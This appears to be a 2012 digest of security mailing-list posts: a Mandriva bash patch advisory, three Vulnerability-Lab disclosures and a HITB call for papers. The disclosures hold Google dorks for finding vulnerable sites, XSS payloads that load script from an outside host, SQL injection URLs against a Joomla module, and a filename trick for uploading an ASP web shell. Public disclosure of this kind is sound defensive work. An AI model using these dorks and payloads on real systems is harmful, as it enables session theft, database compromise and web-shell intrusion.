[ MDVSA-2012:128 ] bash
Mandriva Linux Security Advisory MDVSA-2012:128
http://www.mandriva.com/security/

Package : bash
Date : August 9, 2012
Affected: 2011.

Problem Description:

A vulnerability was found and corrected in bash:

A stack-based buffer overflow flaw was found in the way bash, the GNU Bourne Again shell, expanded certain /dev/fd file names when checking file names ('test' command) and evaluating /dev/fd file names in conditional command expressions. A remote attacker could provide a specially-crafted Bash script that, when executed, would cause the bash executable to crash (CVE-2012-3410).

Additionally the official patches 011 to 037 for bash-4.2 have been applied, which resolves other issues found, including the CVE-2012-3410 vulnerability.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3410
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-011
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-012
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-013
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-014
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-015
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-016
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-017
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-018
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-019
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-020
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-021
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-022
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-023
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-024
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-025
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-026
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-027
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-028
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-029
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-030
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-031
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-032
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-033
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-034
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-035
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-036
ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-037

Updated Packages:

Mandriva Linux 2011:
e855aeda31d44a58bcc5690c3fb32498 2011/i586/bash-4.2-9.1-mdv2011.0.i586.rpm
78bbd74e7af07ce4be8f07901a05e05e 2011/i586/bash-doc-4.2-9.1-mdv2011.0.i586.rpm
dedc630238e16c08a0748d4ab0ecf4e8 2011/SRPMS/bash-4.2-9.1.src.rpm

Mandriva Linux 2011/X86_64:
af9fdfc0bfb3e393f363a25c136ed3f0 2011/x86_64/bash-4.2-9.1-mdv2011.0.x86_64.rpm
7aba42d877ae9c60cc7ac1c82425f500 2011/x86_64/bash-doc-4.2-9.1-mdv2011.0.x86_64.rpm
dedc630238e16c08a0748d4ab0ecf4e8 2011/SRPMS/bash-4.2-9.1.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities
Title: Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities

Date: 2012-07-11

References: http://www.vulnerability-lab.com/get_content.php?id=656

VL-ID: 656

Common Vulnerability Scoring System: 2

Introduction:
Flogr is a flexible script that displays your flickr photos in a customizable photo gallery you host on your website. If you use flickr but want to have a different look and feel for your photo gallery you may like flogr.

Customizable photoblog interface for your flickr photos
Display all flickr photos, only photos with certain tags or only certain photosets
Displays photo details, EXIF data, tags, geo location, and photo comments
Thumbnail viewer displays photos by date taken, photoset, and tag
Embedded Slimbox photo slideshow
Map view of your geo tagged photos
Flickr tag cloud page
RSS 2.0 support

(Copy of the Vendor Homepage: https://code.google.com/p/flogr/ )

Abstract:
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered multiple non persistent Cross Site Scripting Vulnerabilities in the Flogr v2.5.6 v2.3 photo gallery CMS.

Report-Timeline:
2012-07-11: Public or Non-Public Disclosure

Status: Published

Exploitation-Technique: Remote

Severity: Medium

Details:
Multiple non persistent cross site scripting vulnerabilities are detected in the Flogr v2.5.6 v2.3 photo gallery CMS. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user interaction or local low privileged user account. The vulnerabilities are located in recent.php and index.php with the bound vulnerable tag parameter. Successful exploitation can result in account theft, phishing and client-side content request manipulation.

Vulnerable Module(s):
[+] Recent Listing
[+] Index Listing

Vulnerable File(s):
[+] Recent.php
[+] Index.php

Vulnerable Parameter(s):
[+] Tag

Proof of Concept:

Dork(s):
inurl:tag= powered by flogr v2.3
inurl:tag= powered by flogr v2.5.6
inurl:tag= powered by flogr v1.7

PoC:
http://[TARGET]/recent.php?tag=[CROSS SITE SCRIPTING]
http://[TARGET]/index.php?tag=[CROSS SITE SCRIPTING]

Reference(s):
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E
xxx.com/bigpictureproject/index.php?tag=script src%3d//xxx.com/s/script
xxx.com/flogr/recent.php?tag=script src%3d//xxx.com/s/script
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E

Risk:
The security risk of the client side cross site scripting vulnerabilities is estimated as low(+)|(-)medium.

Credits:
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242

Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific
Joomla com_fireboard - SQL Injection Vulnerability
Title: Joomla com_fireboard - SQL Injection Vulnerability

Date: 2012-07-11

References: http://www.vulnerability-lab.com/get_content.php?id=655

VL-ID: 655

Common Vulnerability Scoring System: 7.3

Introduction:
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)

Abstract:
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a SQL Injection Vulnerability in the com_fireboard module of the Joomla CMS.

Report-Timeline:
2012-07-11: Public or Non-Public Disclosure

Status: Published

Exploitation-Technique: Remote

Severity: High

Details:
A SQL Injection vulnerability is detected in the com_fireboard module of the Joomla Content Management System. Remote attackers with low privileged user accounts can execute/inject their own SQL commands to compromise the application DBMS. The vulnerability is located in the com_fireboard module with the bound vulnerable func fb_ parameter. Successful exploitation of the vulnerability results in DBMS (Server) or application (Web) compromise.

Vulnerable Module(s):
[+] index.php?option=com_fireboard

Vulnerable Parameter(s):
[+] func fb_

Proof of Concept:
The SQL injection vulnerability can be exploited by remote attackers without user interaction with low privileged user account. For demonstration or reproduce ...

Dork(s):
inurl:id= intext:/com_fireboard/

PoC:
http://[TARGET]/index.php?option=com_fireboardItemid=0id=1catid=0func=fb_pdf'[SQL-INJECTION]

Reference(s):
xxx.com/index.php?option=com_fireboardItemid=0id=1catid=5func=fb_pdf'[SQL-INJECTION]
xxx.com/2012/index.php?option=com_fireboardItemid=79id=1catid=2func=fb_pdf'[SQL-INJECTION]
xxx.com/fireboard/index.php?option=com_fireboardItemid=38id=22111catid=16func=fb_pdf'[SQL-INJECTION]
xxx.com/board/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION]
xxx.com/jmfireboard/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION]

Risk:
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242
Arasism (IR) CMS - File Upload Vulnerability
Title: Arasism (IR) CMS - File Upload Vulnerability

Date: 2012-07-12

References: http://www.vulnerability-lab.com/get_content.php?id=657

VL-ID: 657

Common Vulnerability Scoring System: 6.5

Abstract:
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a File Upload Vulnerability in the Arasism CMS.

Report-Timeline:
2012-07-12: Public or Non-Public Disclosure

Status: Published

Exploitation-Technique: Remote

Severity: High

Details:
A File Upload vulnerability is detected in the famous Iranian Arasism.com Content Management (Panel) System. The vulnerability allows an attacker (remote) with low privileged user account to bypass the picture upload validation when processing by including own .asp/.php files. Successful exploitation of the vulnerability results in malicious file uploads (malware or webshells) to compromise the application dbms and application system.

Vulnerable Path:
[+] ../sysop/

Vulnerable File(s):
[+] RTE_popup_file_atch.asp

Proof of Concept:
The remote file upload vulnerability can be exploited by a remote attacker without user interaction. For demonstration or reproduce ...

Dork(s):
Powered by Arasism.com Designed Powered By Hadi Farzad Powered By : www.Arasism.Com ØÑÇÍí æ ÇÌÑÇ : åÇÏí ÝÑÒÇÏ | íÔÇãÇä æÈ ÝÑÏÇ

PoC:
Path: ../sysop/
File: RTE_popup_file_atch.asp

NOTE: To upload an asp web shell inject a filename with for example ... shell.asp;1.jpg

Risk:
The security risk of the remote file upload vulnerability is estimated as high.

Credits:
Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242

Copyright © 2012 | Vulnerability Laboratory
[HITB-Announce] HITB Magazine Issue 009 - Call for Submissions
This is a call for article submissions for Issue 009 of HITB's quarterly magazine - http://magazine.hitb.org/ which will be released alongside #HITB2012KUL - The 10 year anniversary of the HITB Security Conference series in Malaysia.

HITB Magazine is a deep-knowledge technical publication and we are only interested in article submissions that are a.) highly technical or b.) that discuss new and never before seen attack and defense methodology.

Please send your article to editor...@hackinthebox.org

Submissions are due no later than 1ST SEPTEMBER 2012.

Topics of interest include, but are not limited to the following:

  Next Generation Attacks and Exploits
  Windows 7 / Windows 8 Security Vulnerabilities
  Apple / OS X / iOS Security Vulnerabilities
  SS7/GSM/PSTN Telephony Networks
  SIP / VoIP Security
  HSDPA / CDMA Security / WIMAX Security / LTE Security
  Physical Security / Locks / Safes
  Security of WLAN, GPS, HAM Radio, Satellite, RFID, Bluetooth, NFC
  Applications of Cryptographic Techniques
  File System Security / File System Forensics
  Side Channel Analysis of Hardware Devices (Medical Devices++)
  Cloud Security
  Network Forensics
  Exploit / Malware Analysis

NOTE: If your article is nothing more than a thinly veiled advertisement for a new product or service your company is offering, please do not submit.

On behalf of The HITB Editorial Team, we look forward to receiving your submissions.

---
Hafez Kamal, HITB Conference Core Crew (.MY),
Hack in The Box (M) Sdn. Bhd.
36th Floor, Menara Maxis, Kuala Lumpur City Centre, 50088 Kuala Lumpur, Malaysia
Tel: +603-26157299 Fax: +603-26150088
PGP Key ID: 0xC0DC7DF8